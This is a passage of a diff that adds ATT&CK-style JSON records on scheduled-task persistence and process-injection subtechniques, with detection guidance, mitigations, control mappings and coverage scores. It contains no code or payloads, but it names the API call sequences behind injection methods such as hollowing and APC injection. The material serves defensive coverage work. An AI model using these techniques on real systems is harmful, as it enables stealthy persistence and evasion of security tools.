+            "Privilege Escalation"
+        ],
+        "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1053",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.6619047619047619,
+        "adjusted_score": 0.6619047619047619,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.3",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1053.006",
+        "name": "Scheduled Task/Job: Systemd Timers",
+        "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.",
+        "url": "https://attack.mitre.org/techniques/T1053/006",
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)",
+        "platforms": [
+            "Linux"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1053",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.2761904761904762,
+        "adjusted_score": 0.2761904761904762,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.3",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "IA-2",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1053.007",
+        "name": "Scheduled Task/Job: Container Orchestration Job",
+        "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)",
+        "url": "https://attack.mitre.org/techniques/T1053/007",
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ",
+        "platforms": [
+            "Containers"
+        ],
+        "data_sources": [
+            "Container: Container Creation",
+            "File: File Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1053",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.16666666666666669,
+        "adjusted_score": 0.16666666666666669,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "IA-2",
+            "IA-8"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1055",
+        "name": "Process Injection",
+        "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
+        "url": "https://attack.mitre.org/techniques/T1055",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Process: Process Access",
+            "Process: Process Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1055.001",
+                "name": "Process Injection: Dynamic-link Library Injection",
+                "url": "https://attack.mitre.org/techniques/T1055/001",
+                "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.002",
+                "name": "Process Injection: Portable Executable Injection",
+                "url": "https://attack.mitre.org/techniques/T1055/002",
+                "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.003",
+                "name": "Process Injection: Thread Execution Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1055/003",
+                "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.004",
+                "name": "Process Injection: Asynchronous Procedure Call",
+                "url": "https://attack.mitre.org/techniques/T1055/004",
+                "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.005",
+                "name": "Process Injection: Thread Local Storage",
+                "url": "https://attack.mitre.org/techniques/T1055/005",
+                "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.008",
+                "name": "Process Injection: Ptrace System Calls",
+                "url": "https://attack.mitre.org/techniques/T1055/008",
+                "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.009",
+                "name": "Process Injection: Proc Memory",
+                "url": "https://attack.mitre.org/techniques/T1055/009",
+                "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.011",
+                "name": "Process Injection: Extra Window Memory Injection",
+                "url": "https://attack.mitre.org/techniques/T1055/011",
+                "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.012",
+                "name": "Process Injection: Process Hollowing",
+                "url": "https://attack.mitre.org/techniques/T1055/012",
+                "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection  before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
+                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    }
+                ]
+            },
+            {
+                "tid": "T1055.013",
+                "name": "Process Injection: Process Doppelgänging",
+                "url": "https://attack.mitre.org/techniques/T1055/013",
+                "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process 